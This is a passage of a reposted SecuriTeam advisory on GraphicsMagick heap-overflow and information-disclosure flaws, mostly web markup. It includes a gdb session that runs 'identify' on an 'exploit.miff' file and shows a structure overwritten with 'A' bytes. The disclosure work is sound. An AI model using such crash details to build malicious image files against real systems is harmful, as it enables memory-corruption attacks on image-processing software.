\t\t<\/p>\n<div id=\"crayon-59f8f774244c4155423934\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> gef\u27a4  r identify -verbose exploit.miff  &#8230;  gef\u27a4  br describe.c:856  Breakpoint 1 at 0x4571df: file magick\/describe.c, line 856.  &#8230;  gef\u27a4  p *image_info  $3 = {  &#8230;    compression = UndefinedCompression,    file = 0x0,    magick = &#8216;\u000000&#8217; &lt;repeats 2052 times&gt;,    filename = &#8216;A&#8217; &lt;repeats 2053 times&gt;,    cache = 0x4141414141414141,    definitions = 0x4141414141414141,    attributes = 0x4141414141414141,    ping = 0x41414141,    preview_type = 1094795585,    affirm = 0x41414141,    blob = 0x4141414141414141,    length = 0x4141414141414141,    unique = &#8216;A&#8217; &lt;repeats 2053 times&gt;,    zero = &#8216;A&#8217; &lt;repeats 2053 times&gt;,    signature = 0x4141414141414141  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c4155423934-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c4155423934-24\">24<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-1\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-i\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">identify<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">verbose <\/span><span class=\"crayon-v\">exploit<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">miff<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-2\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-3\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">br <\/span><span class=\"crayon-v\">describe<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">856<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-4\"><span class=\"crayon-i\">Breakpoint<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">at<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4571df<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">file <\/span><span class=\"crayon-v\">magick<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">describe<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">line<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">856.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-5\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-6\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">p *<\/span><span class=\"crayon-v\">image<\/span><span class=\"crayon-sy\">_<\/span>info<\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-7\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-8\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-9\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">compression<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">UndefinedCompression<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-10\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">file<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-11\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">magick<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;\u000000&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">repeats<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2052<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">times<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-12\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">repeats<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2053<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">times<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-13\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cache<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4141414141414141<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-14\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">definitions<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4141414141414141<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-15\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">attributes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4141414141414141<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-16\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ping<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x41414141<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-17\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">preview_type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1094795585<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-18\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">affirm<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x41414141<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-19\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">blob<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4141414141414141<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-20\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4141414141414141<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-21\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">unique<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">repeats<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2053<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">times<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-22\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">zero<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">repeats<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2053<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">times<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-23\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">signature<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4141414141414141<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-24\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0027 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3494\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 31 Oct 2017 17:25:29 +0000<\/strong><\/p>\n<p>Vulnerabilities summary The following advisory describes two (2) vulnerabilities found in GraphicsMagick. GraphicsMagick is &#8220;The swiss army knife of image processing. Comprised of 267K physical lines (according to David A. Wheeler&#8217;s SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3494\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 GraphicsMagick Multiple Vulnerabilities<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12357,12135,10757],"class_list":["post-10203","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-heap-overflow","tag-information-disclosure","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10203","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10203"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10203\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10203"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10203"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10203"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}